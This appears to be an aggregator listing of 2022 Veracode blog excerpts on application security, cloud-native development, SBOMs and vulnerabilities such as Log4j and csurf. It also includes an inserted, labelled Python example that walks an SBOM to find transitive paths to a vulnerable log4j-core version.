What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
Veracode 2022-10-17 14:44:11 How Azalea Health Ensures Customer Trust with Cloud-based Software Security (direct link) As head of the product department at Azalea Health, I need to understand what our market needs. Based on the conversations that we've had with hospitals and clinics, enterprise-grade security is something they desperately need but rightfully expect their EHR system to provide. That's why it's important for our organization to take the responsibility of securing health data off their shoulders. Because healthcare providers rely on Azalea software to manage patient health records and personal information, our security program starts when the software is being developed. We've always been diligent about software security, and we run penetration tests on a regular basis. However, after we moved our 100 percent cloud-delivered model to AWS in 2021, our focus on security intensified. We recognized the need to catch issues earlier in the development process, before they even got to our staging servers. For us, it was important to find a solution that integrates security into every stage of…
Veracode 2022-10-05 10:56:24 Choosing Secure Container Images: Secure Cloud-native Development Series (direct link) Build secure cloud-native applications by avoiding the top five security pitfalls we lay out in our Secure Cloud-native Development Series. This blog is the first part of the series, and it will teach you how to choose secure container images. When it comes to building secure cloud-native applications, the baseline is choosing a secure container image. Docker defines a container as “a standard unit of software that packages up code and all its dependencies, so the application runs quickly and reliably from one computing environment to another.” The problem is, they're often a pain point for many developers. Journey with us through real examples from the Age of Empires 2 API Project as you learn three ways to ease some pain and strengthen your security posture with container images: pinning, slimming, and updating. 1. Pinning Rather than choosing the “latest” container image, you should be pinning to a specific version of the image. For example: ubuntu:20.04, or python:3.10.6-…
Veracode 2022-10-04 11:20:28 How to See Yourself in Cyber: Top Tips from Industry Leaders (direct link) It's 2022 and as we all know, the world is a very different place. However, one thing that has not changed is the importance of cybersecurity. In fact, it's more important now than ever before, as the SolarWinds hack and Executive Order prove. That's why for Cybersecurity Awareness Month this year, we asked cybersecurity pioneers and leaders to get their insights on staying cyber safe. Here are their thoughts on CISA's 4 Things You Can Do to See Yourself in Cyber. Enable Multi-Factor Authentication “With the continued rise in cybercrime, there are a few simple steps every person should take to protect themselves, if they aren't already. CISA's first recommended step to stay 'cyber-safe' is to implement multi-factor authentication. It significantly lessens the likelihood of being hacked via unauthorized access and compromised credentials, which, according to Verizon's 2021 Data Breach Investigations Report, were the gateway for 61% of data breaches. Enabling multi-factor… Data Breach Hack Guideline ★★
Veracode 2022-10-03 10:46:27 Secure Cloud-native Development: The Top Five Security Pitfalls and How to Avoid Them (direct link) Build secure cloud-native applications by avoiding the top five security pitfalls we lay out in our Secure Cloud-native Development Series. The reason organizations are embracing cloud-native development is clear: AWS reports those who migrated saw an average of 20% infrastructure cost savings and 66% increase in administrator productivity. Moving your development process to the cloud offers these benefits and many others, but it also offers a whole new set of security challenges. This series is aimed at helping developers create secure infrastructure for modern, cloud-native applications. You'll learn the top five security pitfalls you can encounter when building applications in the cloud and how to avoid them. Why take the time to learn about securing cloud-native development? As modern applications are integrated closely with cloud technologies (like containers and serverless), developers must now understand these technologies and how to implement them securely from the start. The… ★★★★
Veracode 2022-09-28 13:09:06 How to Engage Developers to Build a Successful Application Security Program (direct link) If you're helping shape application security in an organization, whether as an external security consultant or vendor, or as part of an internal security team, it is critical to work effectively with developers. While a lot of individuals have an interest and stake in security, and many have a significant role to play, developers who write code and fix flaws determine whether application security initiatives succeed or fail. Fundamentally, developers are the ones who operationalize application security. The sooner and more effectively they address security issues, the more secure applications will be. The problem is that security is not developers' only area of responsibility. Developers have a lot of competing demands and are typically evaluated and incentivized based on speed of delivery and productivity, rather than security. For those focused on security, it can often be a battle to engage effectively with developers and get the buy-in and participation required. If you only… ★★★★★
Veracode 2022-09-27 13:24:27 6 Developer Personas Every Security Practitioner Needs to Understand (direct link) When it comes to engaging developers for a successful application security program, it is helpful to understand the types of developers you are working with. While of course each developer is a unique individual, there are some common personas I have come across in my work with development teams. In fact, as a developer in prior jobs, I have embodied some of these traits myself. Let's dive in. The Competitor This is a developer who feels they know more and do more than their peers, and they want everybody to know that this is the case. These individuals want to be acknowledged as a top contributor and expert, and they treat their work as an opportunity to demonstrate their capabilities. I remember one team ran a scan using an open-source security tool. The scan uncovered around 500 vulnerabilities. The competitive developer took it upon themself to go off, work extra hours and weekends, and single-handedly resolve each vulnerability. To engage the competitor, you can try to roll out… ★★★★★
Veracode 2022-09-26 12:43:57 8 Ways Secure Coding Lets You Work on the Best Projects, Advance Your Career, and Do More of What You Love (direct link) As a developer, DevOps engineer, Infrastructure & Operations lead, or similar, you are on the frontlines of application security. You are also on the frontlines of performance, functionality, stability, user experience…the list goes on. Often it seems like security is just one more requirement, one more box to check, one more obstacle between you, your deadline, and what you really care about. But I see it differently. Security probably is not the reason you love coding, but I bet the reason you love coding is made all the richer by embracing security. Or at least it can be. Hear me out. I have been fortunate enough to work in development and to work with developers for decades. Through that experience, I have come to recognize different developer archetypes and their motivations. There are the creators who thrive on creating something that never existed before the day they wrote it into existence. The often falsely labeled “lazy developers” who are efficiency experts and automate… Guideline
Veracode 2022-09-22 16:06:06 Healthcare Industry Leads the Way in Fixing Software Flaws (direct link) The healthcare industry is transforming patient care through software, from 24/7 digital patient portals, to AI-fueled medical research, and everything in between. As innovation reaches new heights, how does healthcare stack up against other sectors in terms of software security flaws and the ability to remediate them? Our latest State of Software Security Report found that 77 percent of applications in this sector have vulnerabilities – a slight uptick from last year's 75 percent – with 21 percent considered high severity. Healthcare takes first place for fixing flaws at 27 percent. Developers in the space should be applauded for tackling complex authentication issues and insecure dependencies with success over the last 12 months. When clocking the time it takes to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA), healthcare organizations fall right in the middle of the pack. It's also worth mentioning that healthcare…
Veracode 2022-09-19 17:40:15 Analysis and Remediation Guidance of CSRF Vulnerability in Csurf Express.js Middleware (direct link) Technical Summary On 28th of August fortbridge.co.uk reported a vulnerability in the csurf middleware, an Express.js supporting library that enables CSRF protection in Express.js. As of 13th of September, the csurf library has been deprecated with no plans to fix the vulnerabilities. There is no viable alternative for the csurf middleware now. Am I Affected? All versions of the csurf library are vulnerable if: csurf is set up to use double-submit cookies (csurf({cookie: true})) and the default value function is in use. Setting up cookie signatures as described here: https://www.npmjs.com/package/csurf#cookie does not prevent the bypass. Indicators of an Attack A reliable indicator of attempted exploitation would include either: a request query variable _csrf with a value, or a request body variable _csrf with a value. This is assuming the default value function is in use as described here: https://www.npmjs.com/package/csurf#value If verbose access logs are enabled there's another indicator that may be useful. In… Vulnerability
Veracode 2022-09-12 12:46:56 7 Key Benefits of a Reliable Cloud Application Security Partner (direct link) When you're looking to secure your applications, you need to keep a few things in mind. You want to make sure that your software security vendor is a fully SaaS vendor you access in the cloud. That way you benefit from scalability, peer benchmarking, and more. Here's what to look for in an application security testing solution that you can access in the cloud while supporting cloud-native development. Plus, you'll learn why cloud-based trumps on-premises solutions. The key components of a reliable cloud application security partner When you're evaluating the ever-changing landscape of different solutions for securing applications, it's important to consider the following factors. Scalability When distinguishing between cloud and on-premises software security vendors, consider the growth of your program, both long-term and as required in the short term. Cloud vendors offer economy of scale as you grow, saving you the costs inherent in hardware for your data center over time. Can…
Veracode 2022-09-07 18:17:09 3 Ways Software Engineers Can Save Time and Eliminate DevOps Waste (direct link) As software engineers, we are incredibly busy. We're designing new features, writing tests and implementing code, debugging, opening pull requests, and performing code reviews. That's not to mention all of the DevOps stuff that our teams have us doing nowadays, too. Oh yes, and then there are stand-ups, check-ins, one-on-ones, and all-hands. The thing is: you don't have time to waste. If there is wasted time in your workweek, it's worth looking into how to recapture that time. You may find yourself performing a task while asking at the same time, “Why am I spending my time doing this, of all things? Something is wrong here. I've got better things to do.” In this post, we're going to cover what some of those time-wasting and motivation-draining tasks are. We'll consider how you (or your project or your team) got into that mess in the first place. Then, we'll look at how a unified platform can help you recapture that wasted time. Let's dive in and not waste any more time, shall we…
Veracode 2022-08-22 15:34:22 Financial Services Organizations Have Fewer Security Flaws in Applications (direct link) According to our most recent State of Software Security Report, the financial services industry has fewer security flaws in its applications than last year. Great news, right? That said, the reduction in security flaws isn't as significant as we would hope to see. The financial services industry has traditionally been recognized for having the least amount of security flaws. This year, however, the manufacturing industry has dethroned financial services with an average of 72 percent of applications containing a security flaw. Financial services organizations also have more high-severity flaws, 18 percent, and a slower fix rate, 22 percent, than most industries. But take a look at the time it takes the financial services industry to remediate flaws found by static analysis (SAST), dynamic analysis (DAST), and software composition analysis (SCA). When security flaws are found, financial organizations move faster than most to make sure they're remediated. In fact, when it comes…
Veracode 2022-08-17 15:16:19 The Evolution of Application Security in a Cloud-Native World: Q&A with Chris Wysopal (direct link) As technology explodes, so do the threats. Point solutions emerge as security players innovate in order to keep up. This creates the need for consolidation, as the fragmented solutions become too much to manage. We're entering a consolidation phase now, the process of distilling, refining, and letting the cream rise to the top. We sat down with cybersecurity veteran and vigilante, Chris Wysopal, to get his perspective on emerging trends in cloud-native security. Let's dive into the conversation. Natalie Tischler: Chris, it's great to chat with you. I'm inspired by your story and how everything you were doing with L0pht over two decades ago is still what you're doing today: creating a world where software is built securely from the start with clean code. But now we have the cloud. So tell me, what's your take on the evolution of application security in a cloud-native world? Chris Wysopal: What we're seeing with the move to the cloud today mimics the AppSec trends of 15 years ago.… ★★
Veracode 2022-08-15 12:25:27 Announcing the New Veracode® Velocity™ Partner Program (direct link) Veracode is pleased to announce the launch of the new Veracode Velocity Partner Program. We've crafted a 3-step approach to align, enable, and engage with our partners so together we can make the world's software secure. What is the Veracode Velocity Partner Program? The Veracode Velocity Partner Program enables our valued Solution Providers to accelerate their application security revenues leveraging the Veracode Platform. Through a role-based strategy and approach, partners can engage and collaborate with Veracode to achieve our mutual goals and objectives. The knowledge, skills, insights, competencies, and best practices gained enhance our partners' ability to deliver industry-leading security solutions and services. This comprehensive program offers our partners tools, resources, and programs to help ensure success at every stage of the customer journey. The goal is to empower our partner teams so they can effectively sell, market, and support the Veracode Platform in our joint… Guideline
Veracode 2022-08-09 14:37:39 The Veracode Community Refresh: Everything You Need to Know (direct link) You spoke and we listened. Our refreshed Veracode Community is packed with new features and enhancements for a better user experience. The new and improved Veracode Community is here! You can still get the great support you need, when and how you need it. But now we've added simplified navigation, easier onboarding, improved global search, and so much more. Let's dive into the carefully crafted features from the Veracode Community Refresh. Why did we refresh the Veracode Community? We know that building high quality, high performing applications is difficult. We took significant time and energy to refresh the Veracode Community. Quality support, knowledge, tools, and connection are integral to seeing this vision through. And that is exactly what the Veracode Community provides – now more easily than ever. What's new in the new Veracode Community? We've crafted a more welcoming place where everyone can come together to share experiences, learn, and find support on their own terms. We…
Veracode 2022-08-04 10:23:26 7 Key Components of a Reliable Cloud-Native Application Security Partner (direct link) When you're looking to secure the cloud journey from design to build to deployment, you need to keep a few things in mind. You want to make sure that your software security vendor understands the nuances of software security through the entire software development life cycle (SDLC). Security in context is critical for today's businesses in this age of accelerated digital transformation. Here's what to look for in a cloud-native application security testing solution and why cloud-native trumps on-premises solutions. The key components of a reliable cloud-native application security partner When you're evaluating the ever-changing landscape of different solutions for securing applications in the cloud, it's important to consider the following factors. Scalability When distinguishing between cloud-native and on-premises software security vendors, consider the growth of your program, both long-term and as required in the short term. Cloud-native vendors offer economy of scale as you…
Veracode 2022-07-29 13:22:18 A Swift Kick in the Nuts and Bolts of Banking (direct link) The global financial services industry is undergoing a seismic shift and not enough people are truly aware of what this means. By November of this year, banks and other financial institutions must have in place a new process for payment systems that uses the ISO 20022 standard instead of SWIFT. This must be active by November and by 2025, all financial institutions will have to be compliant. This is a huge ask, made even greater by the increasing levels of instability, technological change, and cybercrime impacting the world's nations. Banking is about to change, and that's not something that banks anywhere like to hear. As a platform for relaying electronic messages between financial institutions, the ISO 20022 standard uses Extensible Markup Language (XML) and Abstract Syntax Notation (ASN.1) protocols to communicate, making it more adaptable to various networks, delivering greater transparency and security, and having the capacity to work with non-Latin alphabets. But that doesn't…
Veracode 2022-07-20 05:00:05 Veracode Achieves Public Sector Milestone with FedRAMP Authorization (direct link) The software security landscape has drastically evolved over the past few years. Think back to the start of COVID-19. The sudden shift to virtual operations expedited digital transformations. Government agencies now have to release new digital products and services in tighter timeframes, causing public sector leadership to choose between speed of deployments or verifiably secure code. The data says it all... According to research conducted by the Enterprise Strategy Group (ESG), 85 percent of organizations push vulnerable code to production and 54 percent do so in order to meet critical deadlines. This need for speed isn't only driving government agencies and contractors to push vulnerable code to production – it's changing the way applications are developed. Increased reliance on microservices and open-source libraries means that applications are assembled as much as they are written. This is made evident in version 12, our most recent State of Software Security (SOSS) report, by… Guideline
Veracode 2022-07-19 12:40:39 Yet Another Perspective on Prototype Pollution (direct link) Prototypes JavaScript is a programming language based on prototypes instead of classes. When a new object is created, the features of the prototype object are inherited – this includes arrays, functions, and even class definitions. The new object can also act as a template for other inheriting objects, transferring its properties, and creating the prototype chain. This object-based inheritance provides the flexibility and efficiency that web developers favor, yet this behavior opens applications to vulnerabilities via object manipulation. JavaScript objects are easily manipulated via static methods as demonstrated in this blog post. So, when is a case of object manipulation considered to be prototype pollution? Consider the following example of a constructor named Shape: A new object instance of the Shape object is created using the keyword new. The inheritance schema can be illustrated as such: The following shows the prototype chain where the __proto__ property of the…
Veracode 2022-07-15 14:41:00 Three Ways to Align with the White House's Cybersecurity Recommendations (direct link) The global pandemic and more recent geo-political events have brought an even greater focus on the threat of cyber attacks on individuals and businesses. Even as global lockdowns and restrictions on movement have eased, many organizations have not adapted to remote or hybrid styles of work. The reality that most of the workforce now operates outside a perimeter that can be controlled creates greater opportunity for scammers, hackers and the potential for cyber attacks than ever before. New intelligence suggests that cyber attacks targeting the United States are being considered. To educate companies, the White House provided a fact sheet that included a comprehensive list of security best practices for organizations seeking to rapidly secure their digital infrastructure. The White House statement recommended public and private organizations move with urgency to enhance their cyber security posture and protect critical infrastructures. Specific recommendations include: Mandate the… Threat
Veracode 2022-07-11 11:37:58 How to Leverage Self-Service Peer Benchmarking to Manage and Measure Your Software Security Program (direct link) It is not hard to set application security goals. Security teams want to reduce risk. Developers want to quickly meet the requirements of security policy and hit deadlines. Executives want growth within their risk tolerance. What is hard is defining an appropriate level of risk and measuring whether your AppSec program is efficient, effective, and returning expected outcomes based on your investments. While internal analytics can measure directional progress and performance, they do not offer the context to understand if the progress and performance is above, at, or below average. Peer benchmarking gives you that context. Veracode's self-service peer benchmarking puts the power of our unparalleled data into your hands so you can measure against peer organizations to identify strengths and weaknesses, track KPIs, leverage security as a competitive advantage, and more. There are four essential elements necessary to deliver self-service peer benchmarking: A broad and diverse customer…
Veracode 2022-07-08 15:48:47 Unifying Security and Development (direct link) Most developers don't learn about secure coding in college IT programs. And once they join the workforce, they often don't have the time to learn about secure coding. The responsibility of training developers in secure coding best practices usually falls on security practitioners. Security practitioners are notoriously overworked, often lacking the bandwidth to train developers. Organizations are thus turning to AppSec learning experiences built specifically for development teams. These learning experiences deliver the tools and skills needed to keep an AppSec program on track. According to PeerSpot, the number one ranked solution in application security training software is Veracode Security Labs, which gives developers tools and hands-on training to tackle modern threats and adopt secure coding practices. PeerSpot members who use the platform share why it is deserving of its high ranking. Making the Choice for Veracode Security Labs Veracode Security Labs empowers developers… Tool Threat
Veracode 2022-07-08 15:29:08 Musings of a Former State CTO Part 4: Looking Forward (direct link) With more than 20 years of working in the public sector behind her, Claire Bailey boasts valuable insights for incoming CTOs. She led the State of Arkansas through a pivotal point in the cybersecurity evolution, becoming an expert in balancing efficiency, accessibility, and security. She views this field as one that holds endless untapped benefits for citizens which can change the way they experience being on the receiving end of public sector services. “Computers can help us do things,” says Claire. “So, let's work together to use them to implement the services citizens need.” The CTO is there to guide the way, ensuring that those services are safe, secure, and private – every day, every hour, and every minute – to protect the public from risk. “You don't get to choose what you do and don't know once you assume that role,” says Claire. “There shouldn't be any question anyone can ask you as a CTO that you don't have at your fingertips. And if you don't, then you should be looking for…
Veracode 2022-06-23 17:31:50 Musings of a Former State CTO Part 3: The Cybersecurity Evolution (direct link) Claire Bailey had a front-row seat to the evolution of cybersecurity. Since the 1980s, when she started in the field, security challenges have grown in number and complexity. She learned that the best strategy for mitigating software vulnerabilities and strengthening cybersecurity has come to be summarized in two little words. “Shift left,” Claire says. “Shifting left” is the concept of taking a security task that traditionally occurs in the later stages of the software development process and performing it earlier. This concept is particularly timely given the fact sheet released by the Biden Administration which warns against the likely rise of potential cyberattacks. It recommends building application security into products from the ground up and using modern tools to consistently monitor for potential vulnerabilities. To that end, Claire recommends that CIOs and CTOs look toward the adoption of agile workforces and development processes, converging steps into smaller bites that… Tool
Veracode 2022-06-21 17:48:03 What Are the Most Prevalent Flaws in Your Programming Language? (direct link) A few months ago, we released our 12th annual State of Software Security (SOSS) Report. In our announcement blog, we noted new application development trends (like increased use of microservices and open-source libraries), the positive impact that Veracode Security Labs has on time to remediate security flaws, and the increased use of multiple application security scan types. But what we have yet to dive into is the security flaws we found in different programming languages. Much like last year, we created an interactive heat map that lists out the most prevalent flaws by language along with an explanation of the flaw, supporting SOSS data, and tips for preventing the flaw. It's interesting to see that what might be a common flaw for one language, might not even be of concern for another. Take cross-site scripting (XSS), for example. It's the most common flaw for PHP – at 77.2 percent – but it doesn't make the top 10 for C++. For those of you familiar with last year's heat map, you'…
Veracode 2022-06-16 14:15:06 Musings of a Former State CTO Part 2: Public Service Meets Cybersecurity (direct link) Claire Bailey has made a career of improving cybersecurity and the delivery of citizen services in the public sector. As Director of the Arkansas Department of Information Systems and the State Chief Technology Officer (CTO) starting in the early 2000s, Claire leveraged government systems to work for citizens. What's more, she made it possible for government organizations to share data across multiple platforms – easily and securely. “The minute you have that appointment [to a position of leadership] is the minute you're responsible for all citizen cybersecurity risks,” says Claire, Regional Vice President (RVP) of Governmental Affairs at Veracode. “You don't get to say, 'I'm sorry, I don't know the answer to that,' and move on. You're there to get things done for the public you serve.” Getting things done requires diligence. To improve upon service and security, for example, begin by forging strong partnerships in the private sector. “Working with industry partners helps to maximize… Guideline
Veracode 2022-06-02 15:01:36 Developing Secure Software With Confidence (direct link) Software development and security often have separate challenges and concerns. Developers are worried about pushing software to production in a timely manner. Security teams worry about the security of the code being pushed. Veracode offers a solution that meets the needs of both sides. On PeerSpot, where Veracode is ranked number one in application security, users discuss how Veracode enables them to build an advanced application security program. Marcello T., a software architect at a computer software company, has used Veracode for two years and reports it has improved the way his organization functions, mostly because they can perfect the security issues on their products. For open-source projects, his organization also tested Snyk, which, he says, has some problems because it considers each file inside a repository of GitHub as a separate project. As he put it, “It was creating a lot of false positives. That made it basically unmanageable, so we gave up on using it. I trust…
Veracode 2022-05-25 23:53:25 Musings of a Former State CTO Part 1: The Origin Story (direct link) For decades, Claire Bailey has crusaded to combat threats to IT devices and networks. Her journey began in the early 1980s when a devastating personal experience inspired her to improve the system. Claire's father died of a heart attack in 1980 amid a heatwave hitting their rural Texas town. The hospital system had recently transitioned to a new model in which emergent patients were seen by dedicated ER doctors, rather than personal or family doctors being summoned in to treat them. As a result, Claire's father was seen by an ER doctor who was unfamiliar with him and made a snap judgment that he was likely experiencing discomfort due to the heat or had eaten something bad. He was sent home, despite his requests to stay. A few hours after his discharge, Claire's father passed away. The family entered into a legal dispute with the ER doctor and the hospital, and in the course of discovery, a deposition revealed that the ER doctor didn't have access to her father's physical medical… Threat
Veracode 2022-05-25 14:08:45 Working for Veracode: A Day in the Life of a Public Relations Intern (direct link) How it Started Software security, cybersecurity, application security – before working at Veracode I had a general understanding of these types of terms, but I did not truly grasp the depth and breadth of this industry and its critical role in society. The significant disruption caused by the pandemic has led to an increase in digital transformation efforts with more businesses operating online than ever. Consequently, the digital attack surface is growing at an alarming rate. Prior to Veracode, I worked for a financial communications agency where I gained experience with asset management, private equity, and wealth management clients. After experiencing the day-to-day of PR agency life, I decided to try something new, and switched to an in-house position in a field that had always fascinated me – cybersecurity. In my final week as a Veracoder and master's student at Northeastern University, I took the time to reflect on some of my experiences at Veracode. My university's emphasis on… ★★★
Veracode.webp 2022-05-20 17:41:31 FedRAMP Certification: The 'New Normal' for Public Sector Agencies? (direct link) In the realm of cloud security, public sector agencies have a lot on their plates. From keeping up with the barrage of constantly emerging security guidelines (see below) to the ongoing demands of maintaining software security, the pressure on the government to lock down cybersecurity is immense. Over the last couple of years, Federal Risk and Authorization Management Program (FedRAMP) authorizations (commonly called certifications) have emerged as a ubiquitous cybersecurity standard in the public sector – and it's clear why. As agencies move more IT functions to the cloud, FedRAMP requires cloud service providers to meet a standardized set of security requirements, derived from the Federal Information Security Management Act and National Institute of Standards and Technology publications, allowing agencies to outsource with the confidence that their cloud provider partners are meeting those requirements. Amid the recent cyberattacks – notably SolarWinds and Log4j – government agencies must double down on efforts…
Veracode.webp 2022-05-12 19:06:06 A Look Back at the Executive Order on Cybersecurity (direct link) It has officially been one year since the release of the Biden administration's Executive Order on Cybersecurity (EO 14028, signed May 12, 2021), which outlines security requirements for software vendors selling software to the U.S. government. These requirements include security testing in the development process and a software bill of materials for the open-source libraries in use, so that known vulnerabilities are disclosed and can be tracked in the future, among other things. The Executive Order – put into motion following the cyberattacks on government agencies through software from SolarWinds and Microsoft – calls on the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) to establish the security initiatives necessary to meet the requirements in a given timeframe. As we've seen over the past twelve months, NIST has met most of the timelines. So far, NIST has: defined critical software; published guidance outlining security measures for critical software; published guidelines… ★★
Veracode.webp 2022-05-11 19:08:48 What Is Software Supply Chain Security? (direct link) Most software today isn't developed entirely from scratch. Instead, developers rely on a range of third-party resources to create their applications. By using pre-built libraries, developers don't need to reinvent the wheel. They can use what already exists and spend time on proprietary code, helping to differentiate their software, finish projects quicker, reduce costs, and stay competitive. These third-party libraries make up part of the software supply chain. While their inclusion is beneficial, the software supply chain introduces risk and needs to be secured. Significant breaches in recent times suggest that software supply chain attacks are on the rise. Reading about the Log4j vulnerability or the SolarWinds supply chain attack reminds us that software components can themselves be security threats. Since broad attention to these attacks is relatively recent, most organizations struggle to determine how their applications might be affected and how they should address the threat. Effective… Vulnerability ★★
Veracode.webp 2022-05-06 15:07:55 Coded for Safety (direct link) Ready to secure government applications? Start with Zero Trust. Trust is the foundation of successful relationships. We want to trust our friends, companies, government, etc., and be trusted in return. But sometimes mistrust serves us better. A few years ago, the cyber world adopted an approach to security known as trust but verify. A simplistic approach, it delivered innovative digital services to consumers – securely and efficiently. Yet as cyber threats intensified, security demands shifted. Today's cybersecurity mantra is Zero Trust. This comprehensive IT security model allows organizations to tightly control access to networks, applications, and environments without impacting the performance of applications or the user experience. The bedrock principle of Zero Trust – never trust, always verify – is rapidly becoming the norm in IT security. In the public sector, the government is shifting the security of digital services to Zero Trust. It's a big undertaking – and an important one. Every… ★★★
Veracode.webp 2022-05-02 16:55:28 Official Close of TA Investment Sparks Next Step of Veracode Journey (direct link) Recently I shared with you our excitement about our agreement with TA Associates (TA) to make a significant growth investment in Veracode. I am pleased to share that the deal is now closed, opening up a tremendous new chapter in Veracode's journey. In the weeks since the announcement, people I speak with every day – customers, prospective customers, analysts, journalists who cover the critical software security space, and other Veracoders – ask me, “What do you envision together with TA for this next chapter?” Veracode's history is rooted in bringing awareness to the topic of software security and leading the market to action in this area. Going back to 1998, our founder and CTO Chris Wysopal, also known as Weld Pond, along with his colleagues from the hacker group The L0pht, testified to the US Congress about the importance of securing the software and networks that run the internet. Their forward-thinking led to the formation of Veracode, with a vision to provide a scalable,… Guideline
Veracode.webp 2022-04-25 16:30:51 How to Generate an SBOM in Veracode SCA (direct link) Emerging government regulations have driven the advancement of standards for securing software supply chains. The production of a Software Bill of Materials (SBOM) in a standard format is an increasing audit and compliance need for large organizations. Having an SBOM can help: identify and avoid security risks; understand and manage licensing risks. Veracode Software Composition Analysis (SCA) helps teams qualify and manage risks from software running in their environments, better plan and control their security program, and understand where risks may be as new security threats or new versions of software become available. Generating an SBOM in Veracode SCA: the Veracode SCA SBOM API will help your organization identify vulnerabilities and license risks and help you better understand what software is contained within your application. The SBOM API response provides you with an inventory of the components within your application, including insight into the relationships that the various…
Veracode.webp 2022-04-20 18:35:10 Just Because You Don't Use Log4j or Spring Beans Doesn't Mean Your Application is Unaffected (direct link) By now, you're probably all aware of the recent Log4j and Spring Framework vulnerabilities. As a recap, the Log4j vulnerability (CVE-2021-44228) – made public on December 10, 2021 – was the result of an exploitable logging feature that, if successfully exploited, could allow attackers to perform an RCE (Remote Code Execution) and compromise the affected server. The Spring Framework vulnerability (CVE-2022-22965) – made public on March 29, 2022 – was caused by unforeseen access to Tomcat's ClassLoader as a result of the Module feature added in Java 9. The access could potentially allow an attacker to write a malicious JSP file accessible via the application server. Just because your organization isn't directly using a vulnerable version of Log4j or Spring doesn't mean that you aren't using a Java component or development framework that transitively depends on Log4j or Spring Beans. For example, Apache Struts 2, Elasticsearch, and Apache Kafka, among others, depend on Log4j. Our co-founder and CTO, Chris Wysopal, explained: “There… Vulnerability
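The two entries above make one practical point: an SBOM lists the components and their relationships, and the relationships are what reveal a dependency on Log4j that the application never declares itself. The following is an added example, not Veracode's code and not the output format of its SBOM API: it parses a CycloneDX JSON SBOM (the real CycloneDX layout: bom-ref, purl, licenses, dependencies[].ref/dependsOn), flags components matching a hypothetical advisory record, walks every dependency path from the application down to each flagged component, and lists components with no declared license. The SBOM content, its versions and edges, and the advisory record are constructed for the example.

```python
"""Walk a CycloneDX SBOM to find transitive paths to a vulnerable component.

Added example, not Veracode's code. The SBOM below is constructed; only the
CycloneDX 1.4 JSON shape is real.
"""
import json
from collections import deque

# Constructed SBOM. Component versions and the edges between them are
# illustrative only, not a statement about any real release.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "specVersion": "1.4",
    "metadata": {"component": {"type": "application", "bom-ref": "app",
                               "name": "order-service", "version": "1.0.0"}},
    "components": [
        {"type": "library", "bom-ref": "pkg:maven/org.apache.struts/struts2-core@2.5.26",
         "name": "struts2-core", "version": "2.5.26",
         "purl": "pkg:maven/org.apache.struts/struts2-core@2.5.26",
         "licenses": [{"license": {"id": "Apache-2.0"}}]},
        {"type": "library", "bom-ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
         "name": "log4j-core", "version": "2.14.1",
         "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1",
         "licenses": [{"license": {"id": "Apache-2.0"}}]},
        {"type": "library", "bom-ref": "pkg:maven/com.example/legacy-util@0.3.0",
         "name": "legacy-util", "version": "0.3.0",
         "purl": "pkg:maven/com.example/legacy-util@0.3.0"},  # no license declared
    ],
    "dependencies": [
        {"ref": "app", "dependsOn": ["pkg:maven/org.apache.struts/struts2-core@2.5.26",
                                     "pkg:maven/com.example/legacy-util@0.3.0"]},
        {"ref": "pkg:maven/org.apache.struts/struts2-core@2.5.26",
         "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"]},
        {"ref": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1", "dependsOn": []},
        {"ref": "pkg:maven/com.example/legacy-util@0.3.0", "dependsOn": []},
    ],
})

# Hypothetical advisory record (the shape is ours, not a CVE feed format).
# Log4j 2.15.0 was the first release that closed CVE-2021-44228; later CVEs
# moved the bar further, so take "fixed_in" from the current vendor advisory.
LOG4SHELL_ADVISORY = {"name": "log4j-core", "fixed_in": "2.15.0"}


def load_sbom(text):
    """Return (root bom-ref, {bom-ref: component}, {bom-ref: [child bom-refs]})."""
    bom = json.loads(text)
    root = bom.get("metadata", {}).get("component", {}).get("bom-ref")
    components = {c["bom-ref"]: c for c in bom.get("components", [])}
    graph = {d["ref"]: list(d.get("dependsOn", [])) for d in bom.get("dependencies", [])}
    return root, components, graph


def version_key(version):
    """Numeric dotted versions only (2.14.1 -> (2, 14, 1)); qualifiers are dropped."""
    return tuple(int(p) for p in version.split(".") if p.isdigit())


def affected_components(components, advisory):
    """bom-refs whose name matches the advisory and whose version is below the fix."""
    return sorted(ref for ref, c in components.items()
                  if c.get("name") == advisory["name"]
                  and version_key(c.get("version", "0")) < version_key(advisory["fixed_in"]))


def find_paths(graph, start, target):
    """Every dependency path start -> ... -> target (BFS; a ref is not revisited on a path)."""
    paths, queue = [], deque([[start]])
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            paths.append(path)
            continue
        for child in graph.get(path[-1], []):
            if child not in path:  # cycle guard for malformed graphs
                queue.append(path + [child])
    return paths


def components_without_license(components):
    """License risk: components that declare no license at all."""
    return sorted(ref for ref, c in components.items() if not c.get("licenses"))


def report(sbom_text, advisory):
    """Map each affected bom-ref to its paths from the root, plus unlicensed refs."""
    root, components, graph = load_sbom(sbom_text)
    findings = {ref: find_paths(graph, root, ref)
                for ref in affected_components(components, advisory)}
    return findings, components_without_license(components)


if __name__ == "__main__":
    findings, unlicensed = report(SAMPLE_SBOM, LOG4SHELL_ADVISORY)
    for ref, paths in findings.items():
        print(f"{ref} reached via:")
        for path in paths:
            print("  " + " -> ".join(path))
    print("no license declared:", unlicensed)
```

Run against the constructed SBOM, the only affected component is log4j-core 2.14.1, reached through struts2-core rather than declared by the application, which is the case the post describes. Version comparison here is numeric-only; real SBOMs carry qualifiers (rc, SNAPSHOT) that need a proper version parser before the result is trusted.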
Veracode.webp 2022-04-12 00:49:45 Veracode Acquires ML-Powered Vulnerability Remediation Technology From Jaroona GmbH (direct link) On the heels of our significant growth investment from TA Associates, we are pleased to announce our acquisition of auto-remediation technology from Jaroona. Jaroona's intelligent remediation technology accelerates Veracode's vision and strategy to automatically detect and remediate software vulnerabilities. Jaroona was recognized as a Gartner Inc. 2021 Cool Vendor for DevSecOps. Accelerated development practices and dependency on software have increased the software attack surface exponentially, placing a greater strain on development and security teams to ramp up security awareness and skills as well as find and fix flaws across an evolving technical environment. This investment will allow us to offer a unique benefit to our customers, leveraging our collective knowledge over nearly two decades of helping customers find and fix security flaws. This milestone is yet another step toward our vision to deliver a frictionless experience for developers to find and fix security flaws,… Vulnerability ★★★
